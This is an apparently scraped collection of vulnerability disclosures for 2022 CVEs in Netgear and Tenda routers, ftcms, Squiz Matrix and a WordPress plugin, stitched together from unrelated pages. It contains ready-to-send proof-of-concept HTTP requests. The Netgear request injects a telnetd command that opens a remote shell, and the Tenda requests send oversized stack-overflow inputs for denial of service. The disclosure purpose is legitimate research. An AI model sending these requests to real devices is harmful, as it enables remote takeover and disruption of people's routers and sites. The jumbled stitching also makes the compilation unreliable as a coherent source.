NETGEAR R6200_V2 firmware versions through R6200v2-V1.0.3.12_10.1.11 and R6300_V2 firmware versions through R6300v2-V1.0.4.52_10.0.93 allow remote authenticated attackers to execute arbitrary command via shell metacharacters in the ipv6_fix.cgi ipv6_wan_ipaddr, ipv6_lan_ipaddr, ipv6_wan_length, or ipv6_lan_length parameters.

**Command injection vulnerability in Netgear R6200\_v2 and R6300v2 routers****Basic information**

*   CVE-ID：CVE-2022-30078
*   Vendor: Netgear
*   Product: R6200\_v2 and R6300\_v2
*   Firmware version: All firmware version including the latest R6200v2-V1.0.3.12\_10.1.11 and R6300v2-V1.0.4.52\_10.0.93
*   Firmware download link: https://www.downloads.netgear.com/files/GDC/R6200V2/R6200v2-V1.0.3.12\_10.1.11.zip  
    https://www.downloads.netgear.com/files/GDC/R6300V2/R6300v2-V1.0.4.52\_10.0.93.zip
*   Type: Insecure permissions - code execution

**Vulnerability description**

Vulnerability exists in the binary /sbin/acos_service in all R6200\_v2 and R6300\_v2 firmware versions including the latest R6200v2-V1.0.3.12 and R6300v2-V1.0.4.52. It might also infect some other products, which is recently not analyzed.  
Taking the latest R6200\_V2\_1.0.3.12 firmware as an example, the four variables ipv6_wan_ipaddr, ipv6_lan_ipaddr, ipv6_wan_length, and ipv6_lan_length are passed into a function at offset 0x1B070.  
  
Later, by analyzing the if statement, we can further confirm that these four variables can lead to command injection vulnerabilities. These parameters are passed into a sprintf function by the format string %s. Then, the value is passed to a system, which leads to a command injection vulnerability.  
  
Through further attemps, we found that remote authenticated attackers can modify the value of the vulnerable parameters in website http://192.168.1.1/IPV6\_fixed.htm by sending a modified request. As the vulnerable parameters are directly saved in nvram after sending the request, attackers can then execute arbitrary remote command as they controlled the parameter of a system call.  
After visiting the web page and sending a POST request, if we set the ipv6_wan_ipaddr parameter of the request to be %24%28telnetd+-l+%2Fbin%2Fsh+-p+1235+-b+0.0.0.0%29, we can actually execute command which $(telnetd -l /bin/sh -p 1235-b 0.0.0.0).  
A potential PoC is shown below:

    POST /ipv6_fix.cgi?id=2068267834 HTTP/1.1
    Host: 192.168.1.1
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1087
    Origin: http://192.168.1.1
    Authorization: Basic YWRtaW46YWRtaW4x
    Connection: close
    Referer: http://192.168.1.1/IPV6_fixed.htm
    Cookie: XSRF_TOKEN=1222440606
    Upgrade-Insecure-Requests: 1
    apply=Apply&login_type=Fixed&IPv6WanAddr1=2001&IPv6WanAddr2=3CA2&IPv6WanAddr3=010F&IPv6WanAddr4=00A1&IPv6WanAddr5=121C&IPv6WanAddr6=0000&IPv6WanAddr7=0000&IPv6WanAddr8=0010&ProfixWanLength=6&IPv6Gateway1=2001&IPv6Gateway2=3CA2&IPv6Gateway3=010F&IPv6Gateway4=00A1&IPv6Gateway5=121C&IPv6Gateway6=0000&IPv6Gateway7=0000&IPv6Gateway8=0002&DAddr1=&DAddr2=&DAddr3=&DAddr4=&DAddr5=&DAddr6=&DAddr7=&DAddr8=&PDAddr1=&PDAddr2=&PDAddr3=&PDAddr4=&PDAddr5=&PDAddr6=&PDAddr7=&PDAddr8=&IpAssign=auto&IPv6LanAddr1=3113&IPv6LanAddr2=3CA2&IPv6LanAddr3=010F&IPv6LanAddr4=001A&IPv6LanAddr5=121B&IPv6LanAddr6=0000&IPv6LanAddr7=0000&IPv6LanAddr8=0001&ProfixLanLength=6&ipv6_wan_ipaddr=%24%28telnetd+-l+%2Fbin%2Fsh+-p+1235+-b+0.0.0.0%29&ipv6_lan_ipaddr=3113%3A3CA2%3A010F%3A001A%3A121B%3A0000%3A0000%3A0001&ipv6_wan_length=6&ipv6_lan_length=6&ipv6_pri_dns=%3A%3A%3A%3A%3A%3A%3A&ipv6_sec_dns=%3A%3A%3A%3A%3A%3A%3A&ipv6_wan_gateway=%24%28telnetd+-l+%2Fbin%2Fsh+-p+1234+-b+0.0.0.0%29&ipv6_enable_dhcp=&ipv6_proto=fixed
    

An evidence of the vulnerable is shown below:  
  
Similarly, we can also change the other three parameters to construct similar commands, the evidence of the attacks using these parameters are shown as below:   
  

**Acknowledgment**

This vulnerability credits to @maybethetricker and @river-li

CVE-2022-30078: vulnerabilities/CVE-2022-30078.md at main · 10TG/vulnerabilities

Tenda AC18 router v15.03.05.19 and v15.03.05.05 was discovered to contain a stack overflow via the list parameter at /goform/SetIpMacBind.

**Tenda AC18 Unauthorized stack overflow vulnerability******1\. Affected version:****

V15.03.05.05\_multi and V15.03.05.19\_multi

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

In function fromSetIpMacBind, the content obtained by the program from the list parameter is passed to V22, and then the V22 is directly copied into the dest stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

In order to reproduce the vulnerability, the following steps can be followed:

1.Use the fat simulation firmware V15.03.05.19\_multi

2.Attack with the following overflow POC attacks

    POST /goform/SetIpMacBind HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: /
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 47
    Origin: http://192.168.0.1
    Connection: close
    Referer: http://192.168.0.1/ip_mac_bind.html?random=0.09748691576858626&
    Cookie: password=0d403f6ad9aea37a98da9255140dbf6eewxcvb
    
    bindnum=1&list=02:03:04:05:06:07192.168.0.111aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

This PoC can result in a Dos.

CVE-2022-38312: NWPU_Projct/Tenda/AC18/3 at main · rickytriky/NWPU_Projct

Tenda AC18 router v15.03.05.19 and v15.03.05.05 was discovered to contain a stack overflow via the time parameter at /goform/PowerSaveSet.

**Tenda AC18 Unauthorized stack overflow vulnerability******1\. Affected version:****

V15.03.05.05\_multi and V15.03.05.19\_multi

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

In function setSmartPowerManagement， the v13 variable is obtained directly from the http request parameter time . Then v13 will be splice to stack by function sscanf without any security check, which causes stack overflow. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

In order to reproduce the vulnerability, the following steps can be followed:

1.Use the fat simulation firmware V15.03.05.19\_multi

2.Attack with the following overflow POC attacks

    POST /goform/PowerSaveSet HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: /
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 1999
    Origin: http://192.168.0.1
    Connection: close
    Referer: http://192.168.0.1/sleep_mode.html?random=0.9629635312680853&
    Cookie: password=0d403f6ad9aea37a98da9255140dbf6ektscvb
    
    powerSavingEn=1&time=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111100%3A0001%3A00&ledCloseType=allClose&powerSaveDelay=1
    

This PoC can result in a Dos.

CVE-2022-38311: NWPU_Projct/Tenda/AC18/5 at main · rickytriky/NWPU_Projct

ftcms 2.1 poster.PHP has a XSS vulnerability. The attacker inserts malicious JavaScript code into the web page, causing the user / administrator to trigger malicious code when accessing.

Ftcmsxss vulnerability

Vulnerability Description:

poster. PHP has XSS vulnerability. The attacker inserts malicious JavaScript code into the web page, causing the user / administrator to trigger malicious code when accessing, so as to achieve the purpose of attack.

Vulnerability impact:

Ftcms2.1

Vulnerability code analysis:

The post method receives the data submitted by users without filtering restrictions on the data submitted by users

Then show him directly.

Vulnerability recurrence POC:

POST /ftcms\_v2.1/admin/index.php/poster/add\_type HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,_/_;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------67923751529856257962470253000 Content-Length: 478 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/ftcms\_v2.1/admin/index.php/poster/add\_type Cookie: UM\_distinctid=17fa054f6b24c4-01fb2c97ea5a758-4c3e2d72-14a61c-17fa054f6b42db; CNZZDATA1277817436=1845628291-1647658540-%7C1647658540; skinColor=%2Ftemplets%2Fyycms%2Fcss%2Fmytheme-color1.css%3Fv%3D2.3; history=%5B%7B%22name%22%3A%22%E6%88%98%E7%8B%BC%E7%89%B9%E6%94%BB%E9%98%9F%22%2C%22pic%22%3A%22%22%2C%22link%22%3A%22%2Fqxplay%2F82.html%22%2C%22part%22%3A%221%22%7D%5D; debug-bar-tab=ci-events; debug-bar-state=minimized; Hm\_lvt\_ff7ff59731fd28defa244db58332ee7f=1659488611; Hm\_lpvt\_ff7ff59731fd28defa244db58332ee7f=1659488611; PHPSESSID=4cdcf6d279bf87697a923efd30719924; username=admin; pwd=admin; ci\_session=a%3A6%3A%7Bs%3A10%3A%22session\_id%22%3Bs%3A32%3A%227835677b81bdb97c301c50a7cabd8c2c%22%3Bs%3A10%3A%22ip\_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user\_agent%22%3Bs%3A80%3A%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A103.0%29+Gecko%2F20100101+Firefox%2F103.0%22%3Bs%3A13%3A%22last\_activity%22%3Bi%3A1659510907%3Bs%3A9%3A%22user\_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22user%22%3Ba%3A11%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22name%22%3Bs%3A5%3A%22admin%22%3Bs%3A7%3A%22userpwd%22%3Bs%3A32%3A%2221232f297a57a5a743894a0e4a801fc3%22%3Bs%3A5%3A%22email%22%3Bs%3A15%3A%22admin%40localhost%22%3Bs%3A7%3A%22regtime%22%3Bs%3A1%3A%220%22%3Bs%3A5%3A%22regip%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A9%3A%22logintime%22%3Bs%3A10%3A%221659489291%22%3Bs%3A7%3A%22loginip%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22hits%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22listorder%22%3Bs%3A1%3A%220%22%3Bs%3A4%3A%22type%22%3Bs%3A2%3A%2215%22%3B%7D%7D919898205c1354b76a383744f10fbc5bcf4722d8 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 X-Forwarded-For: 127.0.0.1

\-----------------------------67923751529856257962470253000 Content-Disposition: form-data; name="info\[name\]"

"> -----------------------------67923751529856257962470253000 Content-Disposition: form-data; name="info\[des\]"

"> -----------------------------67923751529856257962470253000 Content-Disposition: form-data; name="dosubmit"

æ��äº¤ -----------------------------67923751529856257962470253000—

CVE-2022-37731: webvue2/ftcmsxss.md at gh-pages · whiex/webvue2

In ftcms 2.1, there is a Cross Site Request Forgery (CSRF) vulnerability in the PHP page, which causes the attacker to forge a link to trick him to click on a malicious link or visit a page containing attack code, and send a request to the server (corresponding to the identity authentication information) as the victim without the victim's knowledge.

**webvue**

Ftcms CSRF vulnerability Vulnerability Description:

News.php There is a CSRF vulnerability in the PHP page, which causes the attacker to forge a link to trick him to click on a malicious link or visit a page containing attack code, and send a request to the server (corresponding to the identity authentication information) as the victim without the victim's knowledge, so as to complete illegal operations (such as transfer, encryption change, etc.).

Vulnerability impact:

Ftcms2.1

Vulnerability code analysis:

Post receives the parameter submitted by the user and inserts it into the database. The key operation is not verified, and the source address is not verified to be normal

Vulnerability recurrence POC:

POST /ftcms\_v2.1/admin/index.php/news/add HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,_/_;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------305284134012023868703806459884 Content-Length: 1526 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/ftcms\_v2.1/admin/index.php/news/add Cookie: UM\_distinctid=17fa054f6b24c4-01fb2c97ea5a758-4c3e2d72-14a61c-17fa054f6b42db; CNZZDATA1277817436=1845628291-1647658540-%7C1647658540; skinColor=%2Ftemplets%2Fyycms%2Fcss%2Fmytheme-color1.css%3Fv%3D2.3; history=%5B%7B%22name%22%3A%22%E6%88%98%E7%8B%BC%E7%89%B9%E6%94%BB%E9%98%9F%22%2C%22pic%22%3A%22%22%2C%22link%22%3A%22%2Fqxplay%2F82.html%22%2C%22part%22%3A%221%22%7D%5D; debug-bar-tab=ci-events; debug-bar-state=minimized; Hm\_lvt\_ff7ff59731fd28defa244db58332ee7f=1659488611; Hm\_lpvt\_ff7ff59731fd28defa244db58332ee7f=1659488611; PHPSESSID=4cdcf6d279bf87697a923efd30719924; username=admin; pwd=admin; ci\_session=a%3A6%3A%7Bs%3A10%3A%22session\_id%22%3Bs%3A32%3A%22a9ea257045ad5d13deed7226ce5549a5%22%3Bs%3A10%3A%22ip\_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user\_agent%22%3Bs%3A80%3A%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A103.0%29+Gecko%2F20100101+Firefox%2F103.0%22%3Bs%3A13%3A%22last\_activity%22%3Bi%3A1659507364%3Bs%3A9%3A%22user\_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22user%22%3Ba%3A11%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22name%22%3Bs%3A5%3A%22admin%22%3Bs%3A7%3A%22userpwd%22%3Bs%3A32%3A%2221232f297a57a5a743894a0e4a801fc3%22%3Bs%3A5%3A%22email%22%3Bs%3A15%3A%22admin%40localhost%22%3Bs%3A7%3A%22regtime%22%3Bs%3A1%3A%220%22%3Bs%3A5%3A%22regip%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A9%3A%22logintime%22%3Bs%3A10%3A%221659489291%22%3Bs%3A7%3A%22loginip%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22hits%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22listorder%22%3Bs%3A1%3A%220%22%3Bs%3A4%3A%22type%22%3Bs%3A2%3A%2215%22%3B%7D%7Dbfe0c537b0aa2eb962fc064b6473bfcd43257af7 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 X-Forwarded-For: 127.0.0.1

\-----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="info\[catid\]"

1 -----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="info\[title\]"

test -----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="info\[keyword\]"

test -----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="info\[des\]"

test -----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="info\[image\]"

\-----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="info\[content\]"

test  
\-----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="info\[add\_introduce\]"

1 -----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="info\[introcude\_length\]"

255 -----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="info\[auto\_thumb\]"

1 -----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="info\[status\]"

1 -----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="info\[hits\]"

0 -----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="dosubmit"

æ��äº¤ -----------------------------305284134012023868703806459884--   When the victim visits the forged link, the information can be successfully added

CVE-2022-37730: webvue/Ftcms CSRF.md at gh-pages · whiex/webvue

Squiz Matrix CMS 6.20 is vulnerable to an Insecure Direct Object Reference caused by failure to correctly validate authorization when submitting a request to change a user's contact details.

**Blogs & Stories**

Attracting more than a half-million annual readers, this is the security community's go-to destination for technical breakdowns of the latest threats, critical vulnerability disclosures and cutting-edge research.

During a recent engagement, Trustwave SpiderLabs discovered an Indirect Object Reference (IDOR) vulnerability within Squiz Matrix CMS which would allow any low privileged user to change the contact details of any other user on a Squiz Matrix instance (including administrators).

As organizations go about their regular routine of finding and adding new technologies to help increase their overall success, each organization must keep in mind the security implications of each move, along with the fact that much of their current technology stack has to be maintained with a well-thought out and quickly implemented patching program.

Oracle Communications Session Border Controller (SBC) is one of the most popular products worldwide that helps service providers deliver trusted, carrier-grade, real-time communications such as VoLTE, VoIP, video conferencing and calling, presence, IM, and IPTV.

Observing the ongoing conflict between Russia and Ukraine, we can clearly see that cyberattacks leveraging malware are an important part of modern hybrid war strategy.

For the price of a Starbuck’s Caramel Frappuccino Grande and a cheese Danish, about $8, a cybercriminal can obtain all the information needed to max out a person’s stolen credit card and possibly steal their identity.

We have observed more than 3,000 emails containing phishing URLs that have utilized IPFS for the past 90 days and it is evident that IPFS is increasingly becoming a popular platform for phishing websites.

Everyone loves buzz words, no? Red team is the newest (well... not that new) coolest thing on the streets of information security city and many cybersecurity pros want to jump right in and become involved in Red team activities at their company.

Trustwave team believed this was a suitable time to take a minute and review some of the watershed moments that had a major impact on cybersecurity between 2011 and 2021.

This blog post describes an authentication bypass within one such device, that allows an attacker with access to the IP network the ability to capture and subsequently replay discrete device commands, which allows for the switching on and off the physical relays on the device.

Facebook Messenger is one of the most popular messaging platform in the world, amassing 988 million monthly active users as of January 2022 according to Statista.

When CVE-2022-21662 (https://nvd.nist.gov/vuln/detail/CVE-2022-21662) came out there wasn’t a much-published material regarding this vulnerability. I want to take some time to explain the importance of using a white-box approach when testing applications for vulnerabilities.

This post will look to illuminate how one tiny legacy protocol, namely "ModBus" could help to understand just how straight forward this could be.

A zero-day vulnerability has been re-disclosed that is very similar to the Follina zero-day announced last week and is actively being tracked by Trustwave SpiderLabs.

People commonly think that any “Internet Connection” is exactly the same, or they may be vaguely aware that some connections are faster than others. However, there are significant differences between the connections. While these differences may not matter to someone who just wants to browse websites and read email, they can be significant or even showstoppers for more advanced users or cybersecurity teams remotely conducting vulnerability and security scan s. This is especially true for anyone looking to do security testing or vulnerability scanning.

Trustwave SpiderLabs is tracking the critical-rated zero-day vulnerability CVE-2022-30190. Threat actors are reported to be actively exploiting this vulnerability in the wild. Microsoft disclosed and issued guidance for CVE-2022-30190 on May 30.

Trustwave SpiderLabs is tracking the critical-rated zero-day vulnerability CVE-2022-26134. Threat actors are reported to be actively exploiting this vulnerability in the wild. Atlassian disclosed and issued guidance for CVE-2022-26134 on June 2.

Trustwave SpiderLabs in early April observed a Grandoreiro malware campaign targeting bank users from Brazil, Spain, and Mexico. The campaign exploits the tax season in target countries by sending out tax-themed phishing emails.

The Trustwave SpiderLabs Email Security team identified a phishing campaign pretending to be a missed package from DHL. What’s interesting about this campaign is that clicking on the link leads to a chatbot that discusses the missed package, provides pictures of it, and guides the potential victim through providing their credit card information and user credentials.

So, what is PwnFox? To put it simply, it’s a BurpPro extension that works with Firefox. It accomplishes two things. First, it helps containerize up to eight (yes, that’s right… eight!) different sessions within one browser and secondly, it organizes all your proxied traffic in Burp BY COLOR!

Trustwave SpiderLabs is tracking a new critical-rated vulnerability (CVE-2022-1388) affecting F5 BIG-IP network devices. Threat actors are reported to be actively exploiting this vulnerability in the wild. F5 disclosed and issued a patch for CVE-2022-1388 on May 4.

**Stay Connected**

**Subscribe**

Sign up to receive the latest security news and trends from Trustwave.

**Trending Topics**

*   All Trending
*   ModSecurity
*   Application Security
*   Malware
*   Penetration Testing
*   MAPP
*   Advisories
*   Spam

CVE-2022-32277: SpiderLabs Blog

The WordPress Infinite Scroll – Ajax Load More plugin for WordPress is vulnerable to Directory Traversal in versions up to, and including, 5.5.3 via the 'type' parameter found in the alm_get_layout() function. This makes it possible for authenticated attackers, with administrative permissions, to read the contents of arbitrary files on the server, which can contain sensitive information.

\=== WordPress Infinite Scroll - Ajax Load More === Contributors: dcooney, connekthq Donate link: https://connekthq.com/donate/ Tags: infinite scroll, load more, ajax, lazy load, endless scroll, infinite scrolling, lazy loading, pagination, ajax, ajax posts, woocommerce, ajax load more, masonry Requires at least: 4.4 Requires PHP: 5.6 Tested up to: 6.0 Stable tag: 5.5.4 License: GPLv2 or later License URI: http://www.gnu.org/licenses/gpl-2.0.html The ultimate infinite scroll and lazy load solution for your WordPress powered website. == Description == Ajax Load More is the ultimate WordPress infinite scroll plugin for lazy loading posts, single posts, pages, comments and more with Ajax powered queries. Build complex custom WordPress queries with the Ajax Load More shortcode builder then add the generated shortcode to your page via the content editor or directly into your template files. Ajax Load More is compatible for endless scrolling with popular eCommerce plugins such as WooCommerce and Easy Digital Downloads. → \[Get More Information\](https://connekthq.com/plugins/ajax-load-more/) ### Features - \*\*Shortcode Builder\*\* - Create your own custom Ajax Load More shortcode by adjusting the various WordPress query parameters in our easy-to-use shortcode builder (see Shortcode Parameters). - \*\*Query Parameters\*\* - Ajax Load More allows you to query WordPress by many different content types. Query by Post Type, Post Format, Date, Category, Tags, Custom Taxonomies, Search Term, Authors and more! - \*\*Repeater Templates\*\* - Edit and extend the functionality of Ajax Load More by creating your own repeater template to match the look and feel of your website (see screenshots). - \*\*Multiple Instances\*\* - You can include multiple instances of Ajax Load More on a single page, post or template. - \*\*Ajax Filtering\*\* - The Ajax Load More \[custom filtering\](https://connekthq.com/plugins/ajax-load-more/examples/filtering/) method will allow you to filter and update your Ajax query results. - \*\*Multisite Compatibility\*\* - Manage repeater templates across all sites in your network. - \*\*Setting Panel\*\* - Customize your version of Ajax Load More by updating various plugin settings. Check out the \*\*\[website\](https://connekthq.com/plugins/ajax-load-more/)\*\* for more information on the features and functionality of Ajax Load More. ### What's New - \*\*\[Elementor Add-on\](https://connekthq.com/plugins/ajax-load-more/add-ons/elementor/)\*\* - Infinite scroll Elementor Posts Widget and WooCommerce widget content with Ajax Load More. - \*\*\[WooCommerce Add-on\](https://connekthq.com/plugins/ajax-load-more/add-ons/woocommerce/)\*\* - Infinite scroll WooCommerce products without updating a line of template code. - \*\*\[Pro Bundle\](https://connekthq.com/plugins/ajax-load-more/pro/)\*\* - Access to all premium Ajax Load More add-ons in a single installation. - \*\*\[Filters Add-on\](https://connekthq.com/plugins/ajax-load-more/add-ons/filters/)\*\* - The Filters add-on provides front-end and admin functionality for building and managing Ajax filters. - \*\*\[Advanced Custom Fields\](https://connekthq.com/plugins/ajax-load-more/examples/advanced-custom-fields/)\*\* - Compatibility and integration added for infinite scrolling Flexible Content, Gallery, Relationship and Repeater fields for Advanced Custom Fields. - \*\*\[Masonry\](https://connekthq.com/plugins/ajax-load-more/examples/masonry/)\*\* - Built-in support and functionality for Masonry layouts. - \*\*\[Progress Bars\](https://connekthq.com/plugins/ajax-load-more/examples/progress-bar/)\*\* - Display a Progress Bar load indicator with each Ajax request. - \*\*\[Scroll Container\](https://connekthq.com/plugins/ajax-load-more/examples/scroll-container/)\*\* - Constraining infinite scroll to a parent container. ### Content Types Ajax Load More can infinite scroll \_almost\_ any content type WordPress offers - from blog posts to multipage content to WooCommerce products - Ajax Load More can handle it all. Check out the examples below: - \[Standard Posts\](https://connekthq.com/plugins/ajax-load-more/examples/default/) - \[Custom Post Types\](https://connekthq.com/plugins/ajax-load-more/examples/masonry/) - \[Pages\](https://connekthq.com/plugins/ajax-load-more/examples/search-results/) - \[Multipage Posts & Pages\](https://connekthq.com/plugins/ajax-load-more/add-ons/next-page/next-page-default/) \\\* - \[Single Posts\](https://connekthq.com/ajax-load-more-posts/alm-post-example/) \\\* - \[Comments\](http://examples.connekthq.com/alm-comments/example-post/) \\\* - \[Advanced Custom Fields\](https://connekthq.com/plugins/ajax-load-more/examples/advanced-custom-fields/) \_\*Add-on required\_ ### Parameters Ajax Load More accepts a variety of query and styling parameters that are passed to WordPress via shortcode or \[PHP function\](https://connekthq.com/plugins/ajax-load-more/docs/implementation-methods). These parameters allow you to customize the content of your infinite scroll by selecting query parameters such as Post Types, Taxonomies, Categories, Tags, etc… you can also control interactive properties such as button labels, scrolling options and transition styles. → \[View Parameters\](https://connekthq.com/plugins/ajax-load-more/docs/shortcode-parameters/) ### Shortcode Builder The Ajax Load More \[Shortcode Builder\](https://connekthq.com/plugins/ajax-load-more/docs/shortcode-builder/) provides an intuitive and easy-to-use admin interface that transforms complex WordPress queries into manageable shortcodes. → \[View Shortcode Builder\](https://connekthq.com/plugins/ajax-load-more/docs/shortcode-builder/) --- #### Example Ajax Load More Shortcode \[ajax\_load\_more post\_type="post, portfolio" posts\_per\_page="6" button\_label="Load More"\] --- #### Examples & Demos - \*\*\[Default\](https://connekthq.com/plugins/ajax-load-more/examples/default/)\*\* - Out of the box functionality and styling. - \*\*\[Advanced Custom Fields\](https://connekthq.com/plugins/ajax-load-more/examples/advanced-custom-fields/)\*\* - Infinite scroll Advanced Custom Fields data with Ajax Load More. - \*\*\[Attachments\](https://connekthq.com/plugins/ajax-load-more/examples/attachments/)\*\* - Endless scroll post attachments. - \*\*\[CSS Grid\](https://connekthq.com/plugins/ajax-load-more/examples/css-grid/)\*\* - Rendering Ajax Load More listings with CSS GridRe. - 